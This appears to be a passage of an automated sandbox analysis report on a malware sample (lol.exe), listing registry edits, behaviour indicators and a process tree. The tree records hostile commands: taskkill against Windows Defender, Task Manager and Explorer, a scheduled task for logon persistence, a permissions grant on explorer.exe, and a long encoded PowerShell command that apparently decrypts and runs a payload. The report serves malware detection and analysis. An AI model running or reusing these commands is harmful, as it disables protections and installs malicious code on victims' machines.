\REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com1 = "32322D7A9D2D83536A3476D670542DDE7DF365AB" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom1 = "E7F568B5FF1F21ABD178D0A78B0E9113" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" xrtlhfmpdy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg xrtlhfmpdy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" xrtlhfmpdy.exe Key created \REGISTRY\MACHINE\Software\Classes\CLV.Classes jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com2 = "6AC8FABFF967F19483753B36819B3992B388038A4212023DE1C945E708A9" jaffa.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WSH\ = "txtfile" xrtlhfmpdy.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 5736 WINWORD.EXE 5736 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2284 msedge.exe 2284 msedge.exe 1960 msedge.exe 1960 msedge.exe 5500 identity_helper.exe 5500 identity_helper.exe 2800 powershell.exe 2800 powershell.exe 2800 powershell.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 5460 xrtlhfmpdy.exe 5460 xrtlhfmpdy.exe 5460 xrtlhfmpdy.exe 5460 xrtlhfmpdy.exe 5460 xrtlhfmpdy.exe 5460 xrtlhfmpdy.exe 5460 xrtlhfmpdy.exe 5460 xrtlhfmpdy.exe 5460 xrtlhfmpdy.exe 5460 xrtlhfmpdy.exe 336 dkjmelpcwqstgwc.exe 336 dkjmelpcwqstgwc.exe 336 dkjmelpcwqstgwc.exe 336 dkjmelpcwqstgwc.exe 336 dkjmelpcwqstgwc.exe 336 dkjmelpcwqstgwc.exe 336 dkjmelpcwqstgwc.exe 336 dkjmelpcwqstgwc.exe 5968 fqlmsghx.exe 5968 fqlmsghx.exe 1676 addvjytjpmrfj.exe 1676 addvjytjpmrfj.exe 1676 addvjytjpmrfj.exe 1676 addvjytjpmrfj.exe 1676 addvjytjpmrfj.exe 1676 addvjytjpmrfj.exe 5968 fqlmsghx.exe 5968 fqlmsghx.exe 1676 addvjytjpmrfj.exe 1676 addvjytjpmrfj.exe 1676 addvjytjpmrfj.exe 1676 addvjytjpmrfj.exe 1676 addvjytjpmrfj.exe 1676 addvjytjpmrfj.exe 5968 fqlmsghx.exe 5968 fqlmsghx.exe 5968 fqlmsghx.exe 5968 fqlmsghx.exe 336 dkjmelpcwqstgwc.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1672 ac3.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 3548 taskkill.exe Token: SeDebugPrivilege 2740 Rover.exe Token: SeDebugPrivilege 4200 scary.exe Token: SeDebugPrivilege 1532 taskkill.exe Token: SeDebugPrivilege 424 taskkill.exe Token: SeDebugPrivilege 5640 Romilyaa.exe Token: SeDebugPrivilege 5912 taskkill.exe Token: SeSystemtimePrivilege 1664 cmd.exe Token: SeSystemtimePrivilege 1664 cmd.exe Token: SeDebugPrivilege 2800 powershell.exe -
Suspicious use of FindShellTrayWindow 45 IoCs
pid Process 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 4928 iexplore.exe 5640 Romilyaa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 5460 xrtlhfmpdy.exe 5460 xrtlhfmpdy.exe 5460 xrtlhfmpdy.exe 1676 addvjytjpmrfj.exe 5968 fqlmsghx.exe 336 dkjmelpcwqstgwc.exe 1676 addvjytjpmrfj.exe 5968 fqlmsghx.exe 336 dkjmelpcwqstgwc.exe 1676 addvjytjpmrfj.exe 5968 fqlmsghx.exe 336 dkjmelpcwqstgwc.exe 5936 fqlmsghx.exe 5936 fqlmsghx.exe 5936 fqlmsghx.exe -
Suspicious use of SendNotifyMessage 43 IoCs
pid Process 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 1960 msedge.exe 5640 Romilyaa.exe 4780 jaffa.exe 4780 jaffa.exe 4780 jaffa.exe 5460 xrtlhfmpdy.exe 5460 xrtlhfmpdy.exe 5460 xrtlhfmpdy.exe 1676 addvjytjpmrfj.exe 5968 fqlmsghx.exe 336 dkjmelpcwqstgwc.exe 1676 addvjytjpmrfj.exe 5968 fqlmsghx.exe 336 dkjmelpcwqstgwc.exe 1676 addvjytjpmrfj.exe 5968 fqlmsghx.exe 336 dkjmelpcwqstgwc.exe 5936 fqlmsghx.exe 5936 fqlmsghx.exe 5936 fqlmsghx.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 4928 iexplore.exe 4928 iexplore.exe 4236 IEXPLORE.EXE 4236 IEXPLORE.EXE 4236 IEXPLORE.EXE 4236 IEXPLORE.EXE 5640 Romilyaa.exe 5736 WINWORD.EXE 5736 WINWORD.EXE 5736 WINWORD.EXE 5736 WINWORD.EXE 5736 WINWORD.EXE 5736 WINWORD.EXE 5736 WINWORD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4436 wrote to memory of 2444 4436 lol.exe 85 PID 4436 wrote to memory of 2444 4436 lol.exe 85 PID 2444 wrote to memory of 1496 2444 loader.exe 87 PID 2444 wrote to memory of 1496 2444 loader.exe 87 PID 1496 wrote to memory of 1664 1496 cmd.exe 89 PID 1496 wrote to memory of 1664 1496 cmd.exe 89 PID 1664 wrote to memory of 3548 1664 cmd.exe 91 PID 1664 wrote to memory of 3548 1664 cmd.exe 91 PID 1664 wrote to memory of 2740 1664 cmd.exe 94 PID 1664 wrote to memory of 2740 1664 cmd.exe 94 PID 1664 wrote to memory of 2740 1664 cmd.exe 94 PID 1664 wrote to memory of 1960 1664 cmd.exe 95 PID 1664 wrote to memory of 1960 1664 cmd.exe 95 PID 1960 wrote to memory of 4568 1960 msedge.exe 97 PID 1960 wrote to memory of 4568 1960 msedge.exe 97 PID 1664 wrote to memory of 2024 1664 cmd.exe 98 PID 1664 wrote to memory of 2024 1664 cmd.exe 98 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 4028 1960 msedge.exe 99 PID 1960 wrote to memory of 2284 1960 msedge.exe 100 PID 1960 wrote to memory of 2284 1960 msedge.exe 100 PID 1960 wrote to memory of 432 1960 msedge.exe 101 PID 1960 wrote to memory of 432 1960 msedge.exe 101 PID 1960 wrote to memory of 432 1960 msedge.exe 101 PID 1960 wrote to memory of 432 1960 msedge.exe 101 PID 1960 wrote to memory of 432 1960 msedge.exe 101 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\lol.exe"C:\Users\Admin\AppData\Local\Temp\lol.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Users\Admin\Desktop\lol_572e988c-28f2-4d9a-bff8-6c283216a4d3\loader.exe"C:\Users\Admin\Desktop\lol_572e988c-28f2-4d9a-bff8-6c283216a4d3\loader.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\lol_572e988c-28f2-4d9a-bff8-6c283216a4d3\temp.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K main.cmd4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\taskkill.exetaskkill /f /im WindowsDefender.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3548
-
-
C:\Users\Admin\Desktop\lol_572e988c-28f2-4d9a-bff8-6c283216a4d3\Rover.exeRover.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\lol_572e988c-28f2-4d9a-bff8-6c283216a4d3\web.htm5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f69646f8,0x7ff9f6964708,0x7ff9f69647186⤵PID:4568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1460,4811763588429041187,5120449176274386666,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:26⤵PID:4028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1460,4811763588429041187,5120449176274386666,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:2284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1460,4811763588429041187,5120449176274386666,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:86⤵PID:432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1460,4811763588429041187,5120449176274386666,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:16⤵PID:2660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1460,4811763588429041187,5120449176274386666,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:16⤵PID:3716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1460,4811763588429041187,5120449176274386666,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:16⤵PID:4392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1460,4811763588429041187,5120449176274386666,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:16⤵PID:4728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1460,4811763588429041187,5120449176274386666,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:16⤵PID:5800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1460,4811763588429041187,5120449176274386666,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:16⤵PID:5984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1460,4811763588429041187,5120449176274386666,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5652 /prefetch:86⤵PID:3648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1460,4811763588429041187,5120449176274386666,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5652 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:5500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1460,4811763588429041187,5120449176274386666,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1988 /prefetch:26⤵PID:6356
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\lol_572e988c-28f2-4d9a-bff8-6c283216a4d3\helper.vbs"5⤵PID:2024
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\lol_572e988c-28f2-4d9a-bff8-6c283216a4d3\spinner.gif5⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4928 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4928 CREDAT:17410 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4236
-
-
-
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
PID:4428
-
-
C:\Users\Admin\Desktop\lol_572e988c-28f2-4d9a-bff8-6c283216a4d3\scary.exescary.exe5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4200 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
PID:2108
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5640 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
PID:2132
-
-
-
-
C:\Users\Admin\Desktop\lol_572e988c-28f2-4d9a-bff8-6c283216a4d3\the.exethe.exe5⤵
- Executes dropped EXE
PID:5272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:424
-
-
C:\Users\Admin\Desktop\lol_572e988c-28f2-4d9a-bff8-6c283216a4d3\ac3.exeac3.exe5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:1672
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im fontdrvhost5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5912
-
-
C:\Windows\system32\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F,M)5⤵
- Modifies file permissions
PID:336
-
-
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
PID:2068
-
-
